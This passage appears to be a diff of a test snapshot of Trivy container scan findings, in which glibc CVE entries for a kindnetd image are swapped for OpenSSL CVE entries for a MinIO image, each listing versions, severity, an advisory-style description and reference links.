"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - 